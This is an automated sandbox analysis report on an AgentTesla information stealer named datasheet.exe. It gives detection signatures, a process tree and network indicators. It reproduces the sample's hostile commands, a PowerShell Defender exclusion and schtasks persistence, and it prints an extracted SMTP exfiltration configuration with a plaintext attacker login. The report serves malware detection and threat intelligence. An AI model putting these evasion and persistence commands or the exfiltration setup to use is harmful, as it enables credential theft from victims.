Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
datasheet.exe

Overview

General Information

Sample name:datasheet.exe
Analysis ID:1559979
MD5:4c7e7bd9eaf56b3936be87a6904f70f8
SHA1:22591d29813790d622a1d49a1e0bf91b20235cf6
SHA256:429e0fa9706ee65774188e538bda0b69a15fb93e97864cedb88e33c650ed9538
Tags:exeuser-lowmal3
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Contains functionality to log keystrokes (.Net Source)
Injects a PE file into a foreign processes
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • datasheet.exe (PID: 2960 cmdline: "C:\Users\user\Desktop\datasheet.exe" MD5: 4C7E7BD9EAF56B3936BE87A6904F70F8)
    • powershell.exe (PID: 3472 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\datasheet.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 5896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 4924 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 4996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 4324 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 6672 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EhzaIxEFbjyd" /XML "C:\Users\user\AppData\Local\Temp\tmp8D3A.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 5268 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 7088 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
    • EhzaIxEFbjyd.exe (PID: 6672 cmdline: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exe MD5: 4C7E7BD9EAF56B3936BE87A6904F70F8)
      • schtasks.exe (PID: 7328 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EhzaIxEFbjyd" /XML "C:\Users\user\AppData\Local\Temp\tmpA381.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
        • conhost.exe (PID: 7336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • RegSvcs.exe (PID: 7384 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
      • RegSvcs.exe (PID: 7392 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Port": "587", "Host": "smtp.yandex.com", "Username": "vladmir@propelind-com.cf", "Password": "marcellinus360"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000009.00000002.2218212331.00000000031C1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000009.00000002.2218212331.00000000031C1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000009.00000002.2218212331.00000000031EC000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        0000000F.00000002.4606620906.0000000002D81000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          0000000F.00000002.4606620906.0000000002D81000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 12 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.datasheet.exe.3d93ea0.2.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              0.2.datasheet.exe.3d93ea0.2.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                0.2.datasheet.exe.3d93ea0.2.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                • 0x3321d:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                • 0x3328f:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                • 0x33319:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                • 0x333ab:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                • 0x33415:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                • 0x33487:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                • 0x3351d:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                • 0x335ad:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                9.2.RegSvcs.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                  9.2.RegSvcs.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                    Click to see the 10 entries

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\datasheet.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\datasheet.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\datasheet.exe", ParentImage: C:\Users\user\Desktop\datasheet.exe, ParentProcessId: 2960, ParentProcessName: datasheet.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\datasheet.exe", ProcessId: 3472, ProcessName: powershell.exe
                    Sigma detected: Powershell Defender Exclusion
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\datasheet.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\datasheet.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\datasheet.exe", ParentImage: C:\Users\user\Desktop\datasheet.exe, ParentProcessId: 2960, ParentProcessName: datasheet.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\datasheet.exe", ProcessId: 3472, ProcessName: powershell.exe
                    Sigma detected: Suspicious Add Scheduled Task Parent
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EhzaIxEFbjyd" /XML "C:\Users\user\AppData\Local\Temp\tmpA381.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EhzaIxEFbjyd" /XML "C:\Users\user\AppData\Local\Temp\tmpA381.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exe, ParentImage: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exe, ParentProcessId: 6672, ParentProcessName: EhzaIxEFbjyd.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EhzaIxEFbjyd" /XML "C:\Users\user\AppData\Local\Temp\tmpA381.tmp", ProcessId: 7328, ProcessName: schtasks.exe
                    Sigma detected: Suspicious Outbound SMTP Connections
                    Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 77.88.21.158, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Initiated: true, ProcessId: 7088, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49714
                    Sigma detected: Suspicious Schtasks From Env Var Folder
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EhzaIxEFbjyd" /XML "C:\Users\user\AppData\Local\Temp\tmp8D3A.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EhzaIxEFbjyd" /XML "C:\Users\user\AppData\Local\Temp\tmp8D3A.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\datasheet.exe", ParentImage: C:\Users\user\Desktop\datasheet.exe, ParentProcessId: 2960, ParentProcessName: datasheet.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EhzaIxEFbjyd" /XML "C:\Users\user\AppData\Local\Temp\tmp8D3A.tmp", ProcessId: 6672, ProcessName: schtasks.exe
                    Sigma detected: Non Interactive PowerShell Process Spawned
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\datasheet.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\datasheet.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\datasheet.exe", ParentImage: C:\Users\user\Desktop\datasheet.exe, ParentProcessId: 2960, ParentProcessName: datasheet.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\datasheet.exe", ProcessId: 3472, ProcessName: powershell.exe

                    Persistence and Installation Behavior

                    barindex
                    Sigma detected: Scheduled temp file as task from temp location
                    Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EhzaIxEFbjyd" /XML "C:\Users\user\AppData\Local\Temp\tmp8D3A.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EhzaIxEFbjyd" /XML "C:\Users\user\AppData\Local\Temp\tmp8D3A.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\datasheet.exe", ParentImage: C:\Users\user\Desktop\datasheet.exe, ParentProcessId: 2960, ParentProcessName: datasheet.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EhzaIxEFbjyd" /XML "C:\Users\user\AppData\Local\Temp\tmp8D3A.tmp", ProcessId: 6672, ProcessName: schtasks.exe

                    Suricata Signatures

                    No Suricata rule has matched

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Antivirus / Scanner detection for submitted sample
                    Source: datasheet.exeAvira: detected
                    Antivirus detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeAvira: detection malicious, Label: HEUR/AGEN.1305393
                    Found malware configuration
                    Source: 0.2.datasheet.exe.3dd06c0.3.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "smtp.yandex.com", "Username": "vladmir@propelind-com.cf", "Password": "marcellinus360"}
                    Multi AV Scanner detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeReversingLabs: Detection: 55%
                    Multi AV Scanner detection for submitted file
                    Source: datasheet.exeReversingLabs: Detection: 55%
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Machine Learning detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeJoe Sandbox ML: detected
                    Machine Learning detection for sample
                    Source: datasheet.exeJoe Sandbox ML: detected
                    Source: datasheet.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.6:49711 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.6:49716 version: TLS 1.2
                    Source: datasheet.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: Ffsv.pdb source: datasheet.exe, EhzaIxEFbjyd.exe.0.dr
                    Source: Binary string: Ffsv.pdbSHA256 source: datasheet.exe, EhzaIxEFbjyd.exe.0.dr
                    Source: C:\Users\user\Desktop\datasheet.exeCode function: 4x nop then jmp 07C00B7Ah0_2_07C0032D
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeCode function: 4x nop then jmp 0750FC92h11_2_0750F445
                    Source: global trafficTCP traffic: 192.168.2.6:49714 -> 77.88.21.158:587
                    Source: Joe Sandbox ViewIP Address: 77.88.21.158 77.88.21.158
                    Source: Joe Sandbox ViewIP Address: 104.26.13.205 104.26.13.205
                    Source: Joe Sandbox ViewIP Address: 104.26.13.205 104.26.13.205
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: unknownDNS query: name: api.ipify.org
                    Source: unknownDNS query: name: api.ipify.org
                    Source: global trafficTCP traffic: 192.168.2.6:49714 -> 77.88.21.158:587
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficDNS traffic detected: DNS query: api.ipify.org
                    Source: global trafficDNS traffic detected: DNS query: smtp.yandex.com
                    Source: RegSvcs.exe, 0000000F.00000002.4616702168.000000000605E000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4616412400.000000000602B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.gl
                    Source: RegSvcs.exe, 0000000F.00000002.4615623153.0000000005F72000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsig
                    Source: RegSvcs.exe, 0000000F.00000002.4606620906.000000000316E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4616251273.0000000006015000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4615623153.0000000005F72000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4614362804.00000000055D0000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4604925690.0000000000E66000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4606620906.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4614478433.00000000055EC000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4606620906.0000000003041000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4606620906.0000000002EFD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4606620906.0000000002E98000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4606620906.0000000002F62000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4606620906.0000000002E45000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4616352892.000000000601F000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4616702168.000000000605E000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4616479784.0000000006046000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/gsrsaovsslca2018.crl0j
                    Source: RegSvcs.exe, 0000000F.00000002.4606620906.000000000316E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4615623153.0000000005F72000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4614362804.00000000055D0000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4616102426.0000000005FF5000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4614478433.00000000055EC000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4614878043.0000000005653000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4606620906.0000000003041000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4606620906.0000000002EFD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4615188392.000000000569C000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4616215912.0000000006011000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4606620906.0000000002F62000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4606620906.0000000002E45000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4616672764.000000000605B000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4616352892.000000000601F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
                    Source: RegSvcs.exe, 0000000F.00000002.4606620906.000000000316E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4615623153.0000000005F72000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4614362804.00000000055D0000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4616102426.0000000005FF5000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4614478433.00000000055EC000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4606620906.0000000003041000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4606620906.0000000002EFD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4615188392.000000000569C000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4616215912.0000000006011000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4606620906.0000000002F62000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4606620906.0000000002E45000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4616672764.000000000605B000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4616352892.000000000601F000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4616702168.000000000605E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root.crl0G
                    Source: RegSvcs.exe, 0000000F.00000002.4606620906.000000000316E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4616251273.0000000006015000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4615623153.0000000005F72000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4614362804.00000000055D0000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4604925690.0000000000E66000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4606620906.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4614478433.00000000055EC000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4606620906.0000000003041000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4606620906.0000000002EFD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4606620906.0000000002E98000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4606620906.0000000002F62000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4606620906.0000000002E45000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4616702168.000000000605E000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4616479784.0000000006046000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/gsrsaovsslca20180V
                    Source: RegSvcs.exe, 0000000F.00000002.4606620906.000000000316E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4615623153.0000000005F72000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4614362804.00000000055D0000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4616102426.0000000005FF5000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4614478433.00000000055EC000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4606620906.0000000003041000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4606620906.0000000002EFD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4615188392.000000000569C000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4616215912.0000000006011000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4606620906.0000000002F62000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4606620906.0000000002E45000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4616672764.000000000605B000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4616352892.000000000601F000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4616702168.000000000605E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/rootr103
                    Source: RegSvcs.exe, 0000000F.00000002.4606620906.000000000316E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4615623153.0000000005F72000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4614362804.00000000055D0000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4616102426.0000000005FF5000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4614478433.00000000055EC000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4606620906.0000000003041000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4606620906.0000000002EFD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4615188392.000000000569C000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4616215912.0000000006011000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4606620906.0000000002F62000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4606620906.0000000002E45000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4616672764.000000000605B000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4616352892.000000000601F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/rootr306
                    Source: datasheet.exe, 00000000.00000002.2187514566.0000000002D75000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2218212331.0000000003171000.00000004.00000800.00020000.00000000.sdmp, EhzaIxEFbjyd.exe, 0000000B.00000002.2236785446.0000000002DD5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4606620906.0000000002D3C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
